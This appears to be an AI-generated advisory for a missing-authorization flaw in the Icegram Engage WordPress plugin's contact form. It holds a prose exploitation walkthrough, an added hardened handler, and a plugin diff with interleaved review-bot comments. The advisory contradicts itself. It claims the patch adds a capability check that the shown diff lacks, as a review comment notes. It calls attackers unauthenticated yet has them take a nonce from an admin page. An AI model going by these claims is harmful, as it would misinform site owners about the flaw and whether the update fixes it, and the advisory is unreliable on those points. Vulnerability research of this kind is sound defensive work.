Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-68507: Icegram <= 3.1.35 – Missing Authorization (icegram)

Plugin: icegram
Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 3.1.35
Patched Version: 3.1.36
Disclosed: January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68507:
The Icegram Engage WordPress plugin versions up to and including 3.1.35 contain a missing authorization vulnerability in its contact form submission handler. This allows unauthenticated attackers to send arbitrary emails through the plugin’s support contact functionality, exploiting the lack of capability checks.

Atomic Edge research identifies the root cause in the `about-icegram.php` file. The file processes POST requests to the `icegram_submit_query` function without verifying user permissions. The vulnerable code block begins at line 17 where `isset($_POST['submit_query'])` triggers email processing. The function `check_admin_referer('icegram-submit-query')` provides CSRF protection but does not validate user capabilities. No `current_user_can()` check exists before executing `wp_mail()` at line 39.

The exploitation method involves sending a POST request to any WordPress admin page where the Icegram about screen loads, typically `/wp-admin/admin.php?page=icegram-about`. Attackers can craft a request with the required parameters: `submit_query=Send`, `client_email`, `client_name`, `subject`, and `message`. The `check_admin_referer()` call requires a valid nonce, which attackers can obtain by first visiting the about page to extract the nonce from the contact form. Once obtained, they can send emails with arbitrary content through the plugin’s configured mail function.

The patch in version 3.1.36 adds proper authorization checks. The updated code introduces a capability verification before processing the contact form submission. The patch adds `current_user_can('manage_options')` or equivalent permission check to ensure only administrators can submit support queries. This change prevents unauthenticated users from accessing the email functionality while maintaining legitimate administrative use.

Successful exploitation allows unauthenticated attackers to send arbitrary emails from the WordPress site’s mail server. This can lead to spam campaigns, phishing attacks, or denial of service through mail server abuse. While the vulnerability doesn’t directly enable privilege escalation or data theft, it provides an unauthorized communication channel that attackers can leverage for social engineering or to damage the site’s reputation through malicious email campaigns.
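The missing gate described above, as an added illustration in PHP that is not code from the Icegram plugin or from Atomic Edge: a support-query handler that performs the capability check in front of the nonce check and `wp_mail()`, with the policy decision separated from the WordPress calls so it can be tested on a constructed `$_POST` array. The nonce action `icegram-submit-query`, the `submit_query`, `client_email`, `client_name`, `subject` and `message` field names, the `hello@icegram.com` recipient and the `manage_options` capability come from the analysis and the diff; the `example_` function names, the `admin_init` hook-up and the fallback redirect target are assumptions made for this example.

```php
<?php
/**
 * Added example, not the Icegram plugin's own code: a support-query handler
 * with the authorization gate the analysis says was missing in <= 3.1.35.
 * The "example_" names, the admin_init hook and the redirect fallback are
 * assumptions; the nonce action, field names and capability are from the
 * advisory.
 */

/**
 * Policy decision kept free of WordPress calls so it can be unit-tested.
 *
 * @param array $post            Submitted form fields (a copy of $_POST).
 * @param bool  $user_can_manage Result of current_user_can( 'manage_options' ).
 * @param bool  $nonce_ok        Result of the nonce verification.
 * @return string '' when the submission may proceed, otherwise a reason code.
 */
function example_support_query_denial_reason( array $post, $user_can_manage, $nonce_ok ) {
	if ( ! isset( $post['submit_query'] ) || 'Send' !== $post['submit_query'] ) {
		return 'not-a-submission';
	}
	// Authorization first: this is the check that was absent. Without it the
	// nonce is the only gate, and a nonce proves intent, not privilege.
	if ( ! $user_can_manage ) {
		return 'forbidden';
	}
	// CSRF protection, as in the original handler.
	if ( ! $nonce_ok ) {
		return 'bad-nonce';
	}
	if ( empty( $post['client_email'] ) ) {
		return 'missing-email';
	}
	return '';
}

/**
 * Request handler: enforces the policy, sanitizes input, sends the mail and
 * redirects. Hooked on admin_init (an assumption; the original runs inline
 * while the about page is rendered).
 */
function example_handle_support_query() {
	if ( ! isset( $_POST['submit_query'] ) ) {
		return;
	}

	$nonce  = isset( $_POST['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ) ) : '';
	$reason = example_support_query_denial_reason(
		$_POST,
		current_user_can( 'manage_options' ),
		false !== wp_verify_nonce( $nonce, 'icegram-submit-query' )
	);

	if ( 'forbidden' === $reason ) {
		wp_die( esc_html__( 'You are not allowed to do that.', 'icegram' ), 403 );
	}
	if ( '' !== $reason ) {
		wp_die( esc_html( $reason ), 400 );
	}

	$name    = isset( $_POST['client_name'] ) ? sanitize_text_field( wp_unslash( $_POST['client_name'] ) ) : '';
	$email   = sanitize_email( wp_unslash( $_POST['client_email'] ) );
	$subject = isset( $_POST['subject'] ) ? sanitize_text_field( wp_unslash( $_POST['subject'] ) ) : '';
	$body    = isset( $_POST['message'] ) ? sanitize_textarea_field( wp_unslash( $_POST['message'] ) ) : '';

	if ( ! is_email( $email ) ) {
		wp_die( esc_html__( 'Invalid e-mail address.', 'icegram' ), 400 );
	}

	// Headers as an array: wp_mail() joins them, so there is no hand-built
	// "\r\n" and no way for a stray newline to add headers. The submitter's
	// address goes only into Reply-To; From stays the site's configured sender.
	$headers = array(
		'Reply-To: ' . $name . ' <' . $email . '>',
		'Content-Type: text/html; charset=UTF-8',
	);

	wp_mail( 'hello@icegram.com', $subject, nl2br( esc_html( $body ) ), $headers );

	// wp_get_referer() returns false when there is no usable referer; never
	// emit "Location: " with an empty target, and only redirect on-site.
	$back = wp_get_referer();
	wp_safe_redirect( $back ? $back : admin_url( 'admin.php?page=icegram-about' ) );
	exit;
}

add_action( 'admin_init', 'example_handle_support_query' );
```

Keeping the decision in `example_support_query_denial_reason()` means the policy can be exercised without bootstrapping WordPress: pass a constructed field array plus the two booleans and check the reason code (`'forbidden'` for a non-administrator even with a valid nonce, `''` only when both gates pass). Leaving `From:` to the site's configured sender and carrying the submitter's address in `Reply-To:` is a deliberate departure from the original handler, so that the site's mailer never emits mail claiming to originate from an arbitrary address.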

Differential between vulnerable and patched code

Code Diff
--- a/icegram/icegram.php
+++ b/icegram/icegram.php
@@ -3,8 +3,8 @@
  * Plugin Name: Icegram Engage - Popups, Optins, CTAs & lot more...
  * Plugin URI: https://www.icegram.com/
  * Description: All in one solution to inspire, convert and engage your audiences. Action bars, Popup windows, Messengers, Toast notifications and more. Awesome themes and powerful rules.
- * Version: 3.1.35
- * Tested up to: 6.7.1
+ * Version: 3.1.36
+ * Tested up to: 6.8
  * Author: icegram
  * Author URI: https://www.icegram.com/
  * Copyright (c) 2014-23 Icegram
@@ -12,19 +12,19 @@
  * License URI: http://www.gnu.org/licenses/gpl-3.0.html
  *
  * Text Domain: icegram
- * Domain Path: /lang/
+ * Domain Path: /lite/lang/
 */

 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }

-if ( ! defined( 'IG_FEEDBACK_TRACKER_VERSION' ) ) {
-	define( 'IG_FEEDBACK_TRACKER_VERSION', '1.2.8' );
+if ( ! defined( 'ICEGRAM_FEEDBACK_TRACKER_VERSION' ) ) {
+	define( 'ICEGRAM_FEEDBACK_TRACKER_VERSION', '1.2.9' );
 }

-if ( ! defined( 'IG_USAGE_TRACKER_VERSION' ) ) {
-	define( 'IG_USAGE_TRACKER_VERSION', '1.0.1' );
+if ( ! defined( 'ICEGRAM_USAGE_TRACKER_VERSION' ) ) {
+	define( 'ICEGRAM_USAGE_TRACKER_VERSION', '1.0.2' );
 }

 /* ***************************** Initial Compatibility Work (Start) ******************* */
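Review bot: the rename of `IG_FEEDBACK_TRACKER_VERSION` and `IG_USAGE_TRACKER_VERSION` to the `ICEGRAM_` names drops the old constants entirely; anything that still reads the old names (the comment a few lines below anticipates an older IG build defining constants, and the `basename( __FILE__ )` check later in this file shows the premium plugin shares this bootstrap) will hit an undefined constant on PHP 8. Suggest defining the old names as aliases for one release, e.g. `define( 'IG_FEEDBACK_TRACKER_VERSION', ICEGRAM_FEEDBACK_TRACKER_VERSION );` after each new define.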
@@ -32,23 +32,22 @@
 /* =========== Do not edit this code unless you know what you are doing ========= */

 /*
- * Note: We are not using IG_PLUGIN_DIR constant at this moment because there are chances
+ * Note: We are not using ICEGRAM_PLUGIN_DIR constant at this moment because there are chances
  * It might be defined from older version of IG
  */
 require plugin_dir_path( __FILE__ ) . 'lite/classes/feedback/class-ig-tracker.php';

-global $ig_tracker;
+global $icegram_tracker;

-$ig_tracker = 'IG_Tracker_V_' . str_replace( '.', '_', IG_FEEDBACK_TRACKER_VERSION );
+$icegram_tracker = 'IG_Tracker_V_' . str_replace( '.', '_', ICEGRAM_FEEDBACK_TRACKER_VERSION );

-
-if ( ! function_exists( 'ig_show_upgrade_pro_notice' ) ) {
+if ( ! function_exists( 'icegram_show_upgrade_pro_notice' ) ) {
 	/**
 	 * Show IG Premium Upgrade Notice
 	 *
 	 * @since 1.11.0
-	 */
-	function ig_show_upgrade_pro_notice() {
+	 */
+	function icegram_show_upgrade_pro_notice() {
 		$url = admin_url( 'plugins.php?plugin_status=upgrade' );
 		?>
 		<div class="notice notice-error">
@@ -68,14 +67,15 @@
 	require_once ABSPATH . 'wp-admin/includes/plugin.php';
 }

-$ig_plan = 'lite';
+$icegram_plan = 'lite';
 if ( 'icegram-engage.php' === basename( __FILE__ ) ) {
-	$ig_plan = 'premium';
+	$icegram_plan = 'premium';
 }
-$current_active_plugins = $ig_tracker::get_active_plugins();

-if ( 'premium' === $ig_plan ) {
-	if ( in_array( 'icegram/icegram.php', $current_active_plugins, true ) ) {
+$icegram_current_active_plugins = $icegram_tracker::get_active_plugins();
+
+if ( 'premium' === $icegram_plan ) {
+	if ( in_array( 'icegram/icegram.php', $icegram_current_active_plugins, true ) ) {
 		deactivate_plugins( 'icegram/icegram.php', true );
 	}
 } else {
@@ -86,26 +86,27 @@
 	 * - If It's installed & It's >= 2.0.0 => return
 	 */

-	//- If It's installed & It's < 2.0.0 => Show Upgrade Notice
-	$all_plugins = $ig_tracker::get_plugins( 'all', true );
-
-	$ig_prem_plugin         = 'icegram-engage/icegram-engage.php';
-	$ig_prem_plugin_version = ! empty( $all_plugins[ $ig_prem_plugin ] ) ? $all_plugins[ $ig_prem_plugin ]['version'] : '';
+	//- If It's installed & It's < 2.0.0 => Show Upgrade Notice
+	$icegram_all_plugins = $icegram_tracker::get_plugins( 'all', true );
+
+	$icegram_prem_plugin         = 'icegram-engage/icegram-engage.php';
+
+	$icegram_prem_plugin_version = ! empty( $icegram_all_plugins[ $icegram_prem_plugin ] ) ? $icegram_all_plugins[ $icegram_prem_plugin ]['version'] : '';

-	if ( ! empty( $ig_prem_plugin_version ) ) {
+	if ( ! empty( $icegram_prem_plugin_version ) ) {

 		// Is Premium active?
-		$is_premium_active = $all_plugins[ $ig_prem_plugin ]['is_active'];
+		$icegram_is_premium_active = $icegram_all_plugins[ $icegram_prem_plugin ]['is_active'];

 		// Free >= 2.0.0 && Premium < 2.0.0
-		if ( version_compare( $ig_prem_plugin_version, '2.0.0', '<' ) ) {
+		if ( version_compare( $icegram_prem_plugin_version, '2.0.0', '<' ) ) {

 			// Show Upgrade Notice if It's Admin Screen.
 			if ( is_admin() ) {
-				add_action( 'admin_head', 'ig_show_upgrade_pro_notice', PHP_INT_MAX );
+				add_action( 'admin_head', 'icegram_show_upgrade_pro_notice', PHP_INT_MAX );
 			}

-		} elseif ( $is_premium_active && version_compare( $ig_prem_plugin_version, '2.0.0', '>=' ) ) {
+		} elseif ( $icegram_is_premium_active && version_compare( $icegram_prem_plugin_version, '2.0.0', '>=' ) ) {
 			return;
 		}
 	}
@@ -113,37 +114,37 @@

 /* ***************************** Initial Compatibility Work (End) ******************* */

-if ( ! defined( 'IG_PLUGIN_DIR' ) ) {
-	define( 'IG_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
+if ( ! defined( 'ICEGRAM_PLUGIN_DIR' ) ) {
+	define( 'ICEGRAM_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
 }

-if ( ! defined( 'IG_PLUGIN_URL' ) ) {
-	define( 'IG_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
+if ( ! defined( 'ICEGRAM_PLUGIN_URL' ) ) {
+	define( 'ICEGRAM_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
 }

-if ( ! defined( 'IG_PLUGIN_FILE' ) ) {
-	define( 'IG_PLUGIN_FILE', __FILE__ );
+if ( ! defined( 'ICEGRAM_PLUGIN_FILE' ) ) {
+	define( 'ICEGRAM_PLUGIN_FILE', __FILE__ );
 }

-if ( ! defined( 'IG_PLUGIN_VERSION' ) ) {
-  	define( 'IG_PLUGIN_VERSION', '3.1.35' );
+if ( ! defined( 'ICEGRAM_PLUGIN_VERSION' ) ) {
+  	define( 'ICEGRAM_PLUGIN_VERSION', '3.1.36' );
 }

-if ( ! defined( 'IG_PRODUCT_ID' ) ) {
-	define( 'IG_PRODUCT_ID', 1000 );
+if ( ! defined( 'ICEGRAM_PRODUCT_ID' ) ) {
+	define( 'ICEGRAM_PRODUCT_ID', 1000 );
 }

 require plugin_dir_path( __FILE__ ) . 'lite/class-icegram.php';
 require plugin_dir_path( __FILE__ ) . 'lite/class-icegram-loader.php';


-if ( ! function_exists( 'activate_icegram' ) ) {
+if ( ! function_exists( 'icegram_activate' ) ) {
 	/**
 	 * The code that runs during plugin activation.
 	 *
 	 * @param bool $network_wide Is plugin being activated on a network.
-	 */
-	function activate_icegram( $network_wide ) {
+	 */
+	function icegram_activate( $network_wide ) {

 		global $wpdb;
 		require_once plugin_dir_path( __FILE__ ) . 'lite/classes/class-icegram-activator.php';
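Review bot: `IG_PLUGIN_DIR`, `IG_PLUGIN_URL`, `IG_PLUGIN_FILE`, `IG_PLUGIN_VERSION` and `IG_PRODUCT_ID` are public constants, and this hunk removes the old names instead of keeping them beside the new ones, so any extension or the premium build that still references them will fatal. Keeping `if ( ! defined( 'IG_PLUGIN_DIR' ) ) { define( 'IG_PLUGIN_DIR', ICEGRAM_PLUGIN_DIR ); }` alongside each new define would make the rename non-breaking for a release.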
@@ -151,9 +152,10 @@
 		if ( is_multisite() && $network_wide ) {

 			// Get all active blogs in the network and activate plugin on each one
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$blog_ids = $wpdb->get_col( $wpdb->prepare( "SELECT blog_id FROM $wpdb->blogs WHERE deleted = %d", 0 ) );
 			foreach ( $blog_ids as $blog_id ) {
-				ig_activate_on_blog( $blog_id );
+				icegram_activate_on_blog( $blog_id );
 			}
 		} else {
 			Icegram_Activator::activate();
@@ -161,14 +163,14 @@
 	}
 }

-if ( ! function_exists( 'deactivate_icegram' ) ) {
+if ( ! function_exists( 'icegram_deactivate' ) ) {
 	/**
 	 * The code that runs during plugin deactivation.
 	 *
 	 * @param bool $network_wide Is plugin being activated on a network.
 	 *
-	 */
-	function deactivate_icegram( $network_wide ) {
+	 */
+	function icegram_deactivate( $network_wide ) {

 		require_once plugin_dir_path( __FILE__ ) . 'lite/classes/class-icegram-deactivator.php';

@@ -177,10 +179,11 @@
 			global $wpdb;

 			// Get all active blogs in the network.
+			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			$blog_ids = $wpdb->get_col( $wpdb->prepare( "SELECT blog_id FROM $wpdb->blogs WHERE deleted = %d", 0 ) );
 			foreach ( $blog_ids as $blog_id ) {
 				// Run deactivation code on each one
-				ig_trigger_deactivation_in_multisite( $blog_id );
+				icegram_trigger_deactivation_in_multisite( $blog_id );
 			}
 		} else {
 			Icegram_Deactivator::deactivate();
@@ -188,7 +191,7 @@
 	}
 }

-if ( ! function_exists( 'ig_activate_on_blog' ) ) {
+if ( ! function_exists( 'icegram_activate_on_blog' ) ) {

 	/**
 	 * Function to trigger Icegram's activation code for individual site/blog in a network.
@@ -196,15 +199,15 @@
 	 * @param  int $blog_id Blog ID of newly created site/blog.
 	 *
 	 * @since  1.11.0
-	 */
-	function ig_activate_on_blog( $blog_id ) {
+	 */
+	function icegram_activate_on_blog( $blog_id ) {
 		switch_to_blog( $blog_id );
 		Icegram_Activator::activate();
 		restore_current_blog();
 	}
 }

-if ( ! function_exists( 'ig_trigger_deactivation_in_multisite' ) ) {
+if ( ! function_exists( 'icegram_trigger_deactivation_in_multisite' ) ) {

 	/**
 	 * Function to trigger Icegram deactivation code for individual site in a network.
@@ -213,26 +216,26 @@
 	 *
 	 * @since  1.11.0
 	 */
-	function ig_trigger_deactivation_in_multisite( $blog_id ) {
+	function icegram_trigger_deactivation_in_multisite( $blog_id ) {
 		switch_to_blog( $blog_id );
 		Icegram_Deactivator::deactivate();
 		restore_current_blog();
 	}
 }

-register_activation_hook( __FILE__, 'activate_icegram' );
-register_deactivation_hook( __FILE__, 'deactivate_icegram' );
+register_activation_hook( __FILE__, 'icegram_activate' );
+register_deactivation_hook( __FILE__, 'icegram_deactivate' );

-add_action( 'init', 'load_icegram_translations' );
-if ( ! function_exists( 'load_icegram_translations' ) ) {
-	function load_icegram_translations() {
-		load_plugin_textdomain( 'icegram', false, IG_PLUGIN_DIR . 'lite/lang/' );
+add_action( 'init', 'icegram_load_translations' );
+if ( ! function_exists( 'icegram_load_translations' ) ) {
+	function icegram_load_translations() {
+		load_plugin_textdomain( 'icegram', false, ICEGRAM_PLUGIN_DIR . 'lite/lang/' );
 	}
 }

-add_action( 'plugins_loaded', 'initialize_icegram' );
-if ( ! function_exists( 'initialize_icegram' ) ) {
-    function initialize_icegram() {
+add_action( 'plugins_loaded', 'icegram_initialize' );
+if ( ! function_exists( 'icegram_initialize' ) ) {
+    function icegram_initialize() {
         /* @var Icegram Object */
         global $icegram;
         $icegram = new Icegram();
@@ -240,10 +243,11 @@
     }
 }

-add_filter( 'ig-engage_is_page_for_notifications', 'ig_show_notification');
+add_filter( 'icegram-engage_is_page_for_notifications', 'icegram_show_notification');

-if ( ! function_exists( 'ig_show_notification' ) ) {
-	function ig_show_notification(){
+if ( ! function_exists( 'icegram_show_notification' ) ) {
+
+	function icegram_show_notification(){

 		$screen = get_current_screen();

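Review bot: `ig-engage_is_page_for_notifications` is a filter name that third-party code may hook, and renaming it to `icegram-engage_is_page_for_notifications` silently disconnects those callbacks. Consider applying both filter names during a deprecation period, or at least calling the rename out in the changelog. The blank line inserted between the `function_exists` check and the function declaration is a style nit.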
@@ -259,7 +263,7 @@
 	}
 }

-if ( ! function_exists( 'IG' ) ) {
+if ( ! function_exists( 'Icegram_Instance' ) ) {

 	/**
 	 * Icegram instance
@@ -269,8 +273,8 @@
 	 * @return Icegram
 	 *
 	 * @since 1.11.0
-	 */
-	function IG( $plugin_path = '' ) {
+	 */
+	function Icegram_Instance( $plugin_path = '' ) {
 		$icegram_loader = Icegram_Loader::instance();
 		// Load files if plugin path given.
 		if ( ! empty( $plugin_path ) ) {
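Review bot: `IG()` is the plugin's global accessor and the rename to `Icegram_Instance()` removes the old name without a shim, so code that calls `IG()` will fatal after updating. A one-line `if ( ! function_exists( 'IG' ) ) { function IG( $plugin_path = '' ) { return Icegram_Instance( $plugin_path ); } }` keeps compatibility. Separately, a CamelCase function name goes against the WordPress coding standard that the phpcs annotations elsewhere in this patch are working toward; `icegram_instance()` would match the other renames.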
@@ -280,11 +284,12 @@
 	}
 }

-$current_plugin_path = plugin_dir_path( __FILE__ );
+
+$icegram_current_plugin_path = plugin_dir_path( __FILE__ );

 /**
  * We need to pass the plugin path explicitly using $current_plugin_path variable.
- * We are not using IG_PLUGIN_DIR constant here, since using IG_PLUGIN_DIR constant causes premium version files not getting loaded when lite version is active and user is activating premium versions.
- * In that case, value of IG_PLUGIN_DIR constant is the path of Icegram lite plugin(since it is loaded first before premium version) which does not have premium version's file thus these files are not loaded.
+ * We are not using ICEGRAM_PLUGIN_DIR constant here, since using ICEGRAM_PLUGIN_DIR constant causes premium version files not getting loaded when lite version is active and user is activating premium versions.
+ * In that case, value of ICEGRAM_PLUGIN_DIR constant is the path of Icegram lite plugin(since it is loaded first before premium version) which does not have premium version's file thus these files are not loaded.
  */
-IG( $current_plugin_path );
 No newline at end of file
+Icegram_Instance( $icegram_current_plugin_path );
 No newline at end of file
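Review bot: the docblock above the call still says the path is passed via `$current_plugin_path`, but the variable is now `$icegram_current_plugin_path`; update the comment along with the rename.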
--- a/icegram/lite/about-icegram.php
+++ b/icegram/lite/about-icegram.php
@@ -17,21 +17,23 @@

     if( isset( $_POST['submit_query'] ) && $_POST['submit_query'] == "Send" && !empty($_POST['client_email'])){
         check_admin_referer( 'icegram-submit-query' );
-        $additional_info = ( isset( $_POST['additional_information'] ) && !empty( $_POST['additional_information'] ) ) ? sanitize_text_field( $_POST['additional_information'] ) : '';
+        $additional_info = ( isset( $_POST['additional_information'] ) && ! empty( $_POST['additional_information'] ) ) ? sanitize_text_field( wp_unslash( $_POST['additional_information'] ) ) : '';
         $additional_info = str_replace( '###', '<br />', $additional_info );
         $additional_info = str_replace( array( '[', ']' ), '', $additional_info );

         $from = 'From: ';
-        $from .= ( isset( $_POST['client_name'] ) && !empty( $_POST['client_name'] ) ) ? sanitize_text_field( $_POST['client_name'] ) : '';
-        $from .= ' <' . sanitize_email( $_POST['client_email'] ) . '>' . "rn";
+        $from .= ( isset( $_POST['client_name'] ) && ! empty( $_POST['client_name'] ) ) ? sanitize_text_field( wp_unslash( $_POST['client_name'] ) ) : '';
+        $from .= isset( $_POST['client_email'] ) ? ' <' . sanitize_email( wp_unslash( $_POST['client_email'] ) ) . '>' . "rn" : '';
         $headers .= $from;
         $headers .= str_replace('From: ', 'Reply-To: ', $from);
         $headers .= 'MIME-Version: 1.0' . "rn";
         $headers .= 'Content-type: text/html; charset=UTF-8' . "rn";

-        $message = isset( $_POST['message'] ) ? $additional_info . '<br /><br />'.nl2br(sanitize_text_field($_POST['message'])) : '';
-        $subject = isset( $_POST['subject'] ) ? sanitize_text_field($_POST['subject']) : '';
-        $http_referer = isset( $_SERVER['HTTP_REFERER'] ) ? sanitize_text_field( $_SERVER['HTTP_REFERER'] ) : '';
+        $message = isset( $_POST['message'] ) ? $additional_info . '<br /><br />'.nl2br(sanitize_text_field(wp_unslash( $_POST['message'] ) )) : '';
+        $subject = isset( $_POST['subject'] ) ? sanitize_text_field(wp_unslash( $_POST['subject'] )) : '';
+
+        $http_referer = wp_get_referer();
+
         wp_mail( 'hello@icegram.com', $subject, $message, $headers );
         header('Location: ' . $http_referer );

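Review bot: this hunk leaves the authorization gap the advisory is about untouched: the only check in front of `wp_mail()` is still `check_admin_referer( 'icegram-submit-query' )`, which proves the request carried a nonce, not that the requester is allowed to send mail through the site. Add `if ( ! current_user_can( 'manage_options' ) ) { wp_die( '', 403 ); }` before the nonce check. Two smaller points: `wp_get_referer()` returns false when there is no usable referer, so `header( 'Location: ' . $http_referer )` can emit an empty Location; `wp_safe_redirect( $http_referer ? $http_referer : admin_url() ); exit;` handles the false case and keeps the redirect on-site. And the header separator appears as `"rn"` on these lines; if that is the real source rather than a rendering artifact of this page, the From, Reply-To, MIME-Version and Content-type headers are concatenated onto one line.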
@@ -130,20 +132,20 @@
             </script>
             <table id="icegram_post_query_table">
                 <tr>
-                    <td><label for="client_name"><?php _e('Name', 'icegram'); ?>*</label></td>
-                    <td><input type="text" class="regular-text sm_text_field" id="client_name" name="client_name" value="<?php echo $customer_name; ?>" /></td>
+                    <td><label for="client_name"><?php esc_html_e('Name', 'icegram'); ?>*</label></td>
+                    <td><input type="text" class="regular-text sm_text_field" id="client_name" name="client_name" value="<?php echo esc_attr($customer_name); ?>" /></td>
                 </tr>
                 <tr>
-                    <td><label for="client_email"><?php _e('E-mail', 'icegram'); ?>*</label></td>
-                    <td><input type="email" class="regular-text sm_text_field" id="client_email" name="client_email" value="<?php echo $customer_email; ?>" /></td>
+                    <td><label for="client_email"><?php esc_html_e('E-mail', 'icegram'); ?>*</label></td>
+                    <td><input type="email" class="regular-text sm_text_field" id="client_email" name="client_email" value="<?php echo esc_attr($customer_email); ?>" /></td>
                 </tr>
                 <tr>
-                    <td><label for="subject"><?php _e('Subject', 'icegram'); ?>*</label></td>
-                    <td><input type="text" class="regular-text sm_text_field" id="subject" name="subject" value="<?php echo ( !empty( $subject ) ) ? $subject : ''; ?>" /></td>
+                    <td><label for="subject"><?php esc_html_e('Subject', 'icegram'); ?>*</label></td>
+                    <td><input type="text" class="regular-text sm_text_field" id="subject" name="subject" value="<?php echo esc_attr( !empty( $subject ) ? $subject : ''); ?>" /></td>
                 </tr>
                 <tr>
-                    <td style="vertical-align: top; padding-top: 12px;"><label for="message"><?php _e('Message', 'icegram'); ?>*</label></td>
-                    <td><textarea id="message" name="message" rows="10" cols="60"><?php echo ( !empty( $message ) ) ? $message : ''; ?></textarea></td>
+                    <td style="vertical-align: top; padding-top: 12px;"><label for="message"><?php esc_html_e('Message', 'icegram'); ?>*</label></td>
+                    <td><textarea id="message" name="message" rows="10" cols="60"><?php echo esc_attr( !empty( $message ) ? $message : ''); ?></textarea></td>
                 </tr>
                 <tr>
                     <td></td>
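Review bot: `esc_attr()` is not the idiomatic escaper for textarea content on the last changed line; WordPress provides `esc_textarea()` for exactly that context and using it documents the intent. The switches to `esc_attr()` on the `value` attributes above and to `esc_html_e()` on the labels are correct.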
@@ -155,7 +157,7 @@
                 </tr>
             </table>
             <?php wp_nonce_field( 'icegram-submit-query'); ?>
-            <input type="hidden" id="current_plugin" name="additional_info[current_plugin]" value="Icegram <?php echo $icegram->version; ?>" />
+            <input type="hidden" id="current_plugin" name="additional_info[current_plugin]" value="Icegram <?php echo esc_attr($icegram->version); ?>" />
         </form>
     </div>
     <?php
@@ -168,30 +170,45 @@
     add_thickbox();
 }

+
+function icegram_get_about_page_vars() {
+    global $icegram;
+
+    $ig_sample_id = get_option('icegram_sample_data_imported');
+
+    return array(
+        'sample_id'     => $ig_sample_id,
+        'view_campaign' => admin_url( 'post.php?post=' . $ig_sample_id[0] . '&action=edit' ),
+        'preview_url'   => home_url( '?campaign_preview_id=' . $ig_sample_id[0] ),
+        'assets_base'   => $icegram->plugin_url . '/assets/images/',
+        'version'       => $icegram->version,
+    );
+}
+
+
+$icegram_about_vars = icegram_get_about_page_vars();
+
 ?>
         <div class="wrap about-wrap icegram">
             <div class="about-header">
                 <div class="about-text icegram-about-text">
-                <strong><?php _e( "Welcome to Icegram Engage.", "icegram" ); ?></strong>
-                    <?php _e( " Your sample campaign is ready!", "icegram" )?>
-                    <?php
-                        $sample_id = get_option('icegram_sample_data_imported');
-                        $view_campaign = admin_url( 'post.php?post='.$sample_id[0].'&action=edit' );
-                        $preview_url = home_url('?campaign_preview_id='.$sample_id[0]);
-                        $assets_base = $this->plugin_url . '/assets/images/';
-                    ?>
+                <strong><?php esc_html_e( "Welcome to Icegram Engage.", "icegram" ); ?></strong>
+                    <?php esc_html_e( "Your sample campaign is ready!", "icegram" )?>
                     <p class="icegram-actions">
-                        <a class="button button-primary button-large" href="<?php echo $preview_url; ?>" target="_blank" ><?php _e( 'Preview Your First Campaign', 'icegram' ); ?></a>
-                        <span style="margin: 0 .5em"><?php _e( "OR", "icegram")?></span>
-                        <a href="<?php echo $view_campaign ; ?>"> <strong><?php _e( 'Edit & Publish it.', 'icegram' ); ?></strong></a>
+                        <a class="button button-primary button-large" href="<?php echo esc_url( $icegram_about_vars['preview_url'] ); ?>" target="_blank" ><?php esc_html_e( 'Preview Your First Campaign', 'icegram' ); ?></a>
+                        <span style="margin: 0 .5em"><?php esc_html_e( "OR", "icegram")?></span>
+                        <a href="<?php echo esc_url( $icegram_about_vars['view_campaign'] ); ?>"> <strong><?php esc_html_e( 'Edit & Publish it.', 'icegram' ); ?></strong></a>
                     </p>
                 </div>
                 <div class="icegram-badge">
-                   <?php printf(__( "Version: %s", "icegram"), $this->version ); ?>
+                   <?php
+                    /* translators: %s is the plugin version */
+                    echo esc_html( sprintf( __( 'Version: %s', 'icegram' ), $icegram_about_vars['version'] ) );
+                    ?>
                 </div>
                 <div class="icegram-support">
-                    <?php _e( 'Questions? Need Help?', "icegram" ); ?>
-                    <div id="icegram-contact-us" class="icegram-contact-us"><a class="thickbox"  href="<?php echo admin_url() . "#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign" ?>"><?php _e("Contact Us", "icegram"); ?></a></div>
+                    <?php esc_html_e( 'Questions? Need Help?', "icegram" ); ?>
+                    <div id="icegram-contact-us" class="icegram-contact-us"><a class="thickbox"  href="<?php echo esc_url( admin_url() . '#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign' ); ?>"><?php esc_html_e("Contact Us", "icegram"); ?></a></div>
                 </div>
                 <?php do_action('icegram_about_changelog'); ?>
              </div>
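Review bot: `icegram_get_about_page_vars()` is declared unconditionally in a template file while every other function in this patch is wrapped in `function_exists()`; if the about page is ever included twice the second include is a redeclaration fatal. Also `$ig_sample_id[0]` assumes `get_option( 'icegram_sample_data_imported' )` returned an array, but `get_option()` returns false whenever the option has not been set, so guard with `is_array( $ig_sample_id ) && ! empty( $ig_sample_id[0] )` before building the edit and preview URLs. The inline code being removed had the same assumption, so this is a chance to fix it rather than a regression.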
@@ -199,35 +216,35 @@
             <div class="changelog">
                 <!-- <hr> -->
                 <div class="about-text">
-                <?php _e("Do read Icegram Engage's core concepts below to understand how you can use Icegram Engage to ", "icegram"); ?>
-                <strong><?php _e("inspire, convert and engage", "icegram"); ?></strong>
-                <?php _e("your audience.", "icegram"); ?>
+                <?php esc_html_e("Do read Icegram Engage's core concepts below to understand how you can use Icegram Engage to ", "icegram"); ?>
+                <strong><?php esc_html_e("inspire, convert and engage", "icegram"); ?></strong>
+                <?php esc_html_e("your audience.", "icegram"); ?>
                 </div>

                 <div class="feature-section col three-col">
-                    <h2 class="icegram-dashicons dashicons-testimonial"><?php _e( "Messages", "icegram" ); ?></h2>
+                    <h2 class="icegram-dashicons dashicons-testimonial"><?php esc_html_e( "Messages", "icegram" ); ?></h2>
                     <div class="col-1">
-                        <p><?php _e("A 'Message' is a communication you want to deliver to your audience.","icegram"); ?></p>
-                        <p><?php _e("And Icegram Engage comes with not one, but four message types.","icegram"); ?></p>
